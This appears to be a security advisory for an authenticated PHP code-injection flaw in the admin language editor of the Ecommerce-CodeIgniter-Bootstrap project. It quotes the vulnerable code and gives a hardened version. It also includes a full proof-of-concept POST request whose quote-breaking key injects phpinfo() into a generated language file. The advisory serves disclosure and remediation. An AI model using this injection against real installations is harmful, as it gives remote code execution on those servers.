vendor: kirilkirkov/Ecommerce-CodeIgniter-Bootstrap (github.com)
version: before Vulnerability fixes from Lion Tree · kirilkirkov/Ecommerce-CodeIgniter-Bootstrap@d22b54e (github.com)
A code injection (CWE-94) vulnerability exists in application/modules/admin/controllers/advanced_settings/Languages.php.
In the saveLanguageFiles method, each element of $_POST['php_keys'] is passed through htmlentities and enclosed in single quotes to form the key of $lang. However, htmlentities (with its default ENT_COMPAT flags on PHP versions before 8.1) does not escape ', which allows an attacker to break out of the single-quoted string and inject arbitrary PHP code into the generated language file, leading to authenticated remote code execution.
private function saveLanguageFiles()
{
    $i = 0;
    $prevFile = 'none';
    $phpFileInclude = "<?php \n";
    foreach ($_POST['php_files'] as $phpFile) {
        if ($phpFile != $prevFile && $i > 0) {
            savefile($prevFile, $phpFileInclude);
            $phpFileInclude = "<?php \n";
        }
        // values: quotes are replaced by HTML entities before being written
        $php_value = str_replace("'", '&#39;', $_POST['php_values'][$i]);
        $php_value = str_replace('"', '&quot;', $php_value);
        // keys: only htmlentities(), which leaves a single quote untouched
        $phpFileInclude .= '$lang[\'' . htmlentities($_POST['php_keys'][$i]) . '\'] = \'' . $php_value . '\';' . "\n";
        $prevFile = $phpFile;
        $i++;
    }
    savefile($phpFile, $phpFileInclude);
    // ......
}

function savefile($file, $info)
{
    $file = fopen($file, "w");
    fwrite($file, $info);
    fclose($file);
}
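As an added example (not the project's own code), the vulnerable line builder from above placed beside a hardened version that whitelists the key and lets var_export() produce a correctly escaped PHP string literal for the value; the function names vulnerableLine and safeLine are assumptions used for illustration.

```php
<?php
// Mirrors the original: htmlentities() on the key, manual quote replacement
// on the value. With ENT_COMPAT (the htmlentities default before PHP 8.1) a
// single quote in the key is passed through unchanged.
function vulnerableLine(string $key, string $value): string
{
    $value = str_replace("'", '&#39;', $value);
    $value = str_replace('"', '&quot;', $value);
    return '$lang[\'' . htmlentities($key, ENT_COMPAT) . '\'] = \'' . $value . '\';' . "\n";
}

// Hardened: accept only identifier-like keys, and emit both key and value
// with var_export(), which escapes ' and \ so the literal cannot be closed.
function safeLine(string $key, string $value): string
{
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $key)) {
        throw new InvalidArgumentException('Invalid language key: ' . $key);
    }
    return '$lang[' . var_export($key, true) . '] = ' . var_export($value, true) . ";\n";
}

// Constructed input: the key from the report's request body (php_keys[]).
$injectedKey = "'.phpinfo().'";

// The original builder writes the same injectable line shown in the report.
echo vulnerableLine($injectedKey, 'Home');

// The hardened builder refuses the key outright.
try {
    echo safeLine($injectedKey, 'Home');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ' . $e->getMessage() . "\n";
}

// A legitimate key with a value containing a quote is written safely,
// because var_export() backslash-escapes the quote inside the literal.
echo safeLine('production', "It's live");
```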
The steps to reproduce are as follows:
POST /Ecommerce-CodeIgniter-Bootstrap/admin/languages/?editLang=english HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 39539
Origin: http://localhost
Connection: close
Referer: http://localhost/Ecommerce-CodeIgniter-Bootstrap/admin/languages/?editLang=english
Cookie: ci_session=s42mnne1b8qtto2hfi675l8ej6a34me2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
goDaddyGo=&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D='.phpinfo().'&php_values%5B%5D=Home&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=production&php_values%5B%5D=Production&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=pass_change&php_values%5B%5D=Pass+Change&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=security&php_values%5B%5D=Security&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=changed&php_values%5B%5D=Changed&php_files%5B%5D=application%5Clanguage%5Cenglish%5Cadmin_lang.php&php_keys%5B%5D=change_my_password
......
The generated application/language/english/admin_lang.php will then contain:

<?php
$lang[''.phpinfo().''] = 'Home';
$lang['production'] = 'Production';
......
Visiting http://localhost/Ecommerce-CodeIgniter-Bootstrap/index.php/admin/languages again loads the rewritten language file, and phpinfo() is executed.